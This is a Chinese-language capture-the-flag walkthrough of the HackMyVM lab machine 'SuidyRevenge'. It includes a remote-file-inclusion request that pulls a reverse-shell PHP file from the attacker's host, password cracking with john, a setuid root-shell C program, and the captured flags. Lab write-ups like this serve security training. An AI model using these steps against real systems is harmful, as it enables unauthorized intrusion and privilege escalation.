SuidyRevenge

项目地址:https://downloads.hackmyvm.eu/suidyrevenge.zip

是一个打包好的镜像文件

注意:导入 ova 时一定要选择我已移动,否则没网

使用 Nmap 扫描出开放服务及操作系统版本

RCE

simple-backdoor

访问页面

查看源码有注释提示

1
"mudra" 才不是什么最好的管理员,我还在里面!!! 他只是把我的密码改了,但我来得及从我的 KALI 系统里放了 2 个 PHP 后门 到 /supersecure 目录下,来保持访问权限! —— theuser

根据提示从 Kali 中找自带的 PHP WebShell

最后一个可以访问

查看源码找到了使用方法

远程文件包含

mysuperbackdoor

查看文件发现了另一个后门

访问过去回显 file parameter is my friend.

前面的 cmd parameter is my friend. 表示 cmd 的参数,那这个就说明参数是 file

file 本身就具有文件的意思,应该是要传入文件名

果然和预想的一样

接下来测试远程文件包含

1
?file=http://192.168.125.4:8989/reverp.php

成功 RCE

提权

Python 升级为交互式 Shell

敏感信息泄露

在提升 Shell 交互式后,在 html/ 目录下找到提示信息

爆破得到密码 iloveyou

查看 home 目录发现还有这么多用户

根据前面的网页注释有提到 theuser

1
2
3
4
5
6
7
8
9
10
Im proud to announce that "theuser" is not anymore in our servers. Our admin "mudra" is the best admin of the world. -suidy
<!--
 
"mudra" is not the best admin, IM IN!!!!
He only changed my password to a different but I had time
to put 2 backdoors (.php) from my KALI into /supersecure to keep the access!
 
-theuser
 
-->

密码就是 different(又玩脑洞),登录成功

要找到 violent 用户的私钥

find 查找 id_rsa

登录还是需要输入密码

john 爆破出密码为 ihateu

登录成功

SUID 提权

查找具有 SUID 权限的文件(theuser 用户需要看上面弱口令部分)

直接运行提权成功

环境变量劫持

查看提示

1
2
3
root runs the script as in the past that always gives SUID to suidyyyyy binary

译:root 用户像过去一样运行着那个脚本,它总是会给 suidyyyyy 这个二进制文件赋予 SUID 权限

所以我们可以创建一个恶意的 suidyyyyy 文件,等待提示中的脚本给我们权限,然后再运行

1
2
3
4
5
6
7
8
9
10
11
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

int main (void)
{
    setgid(0);
    setuid(0);
    system("/bin/bash");
    return 0;   
}

删除原文件,把我们的恶意文件拷贝过去等待赋权

最后看其他大佬的 WP 说是有大小检查,所以这里死活提不上去

1
rm /home/suidy/suidyyyyy && cp /tmp/suidyyyyy /home/suidy/suidyyyyy

1
2
HMVbisoususeryay
HMVvoilarootlala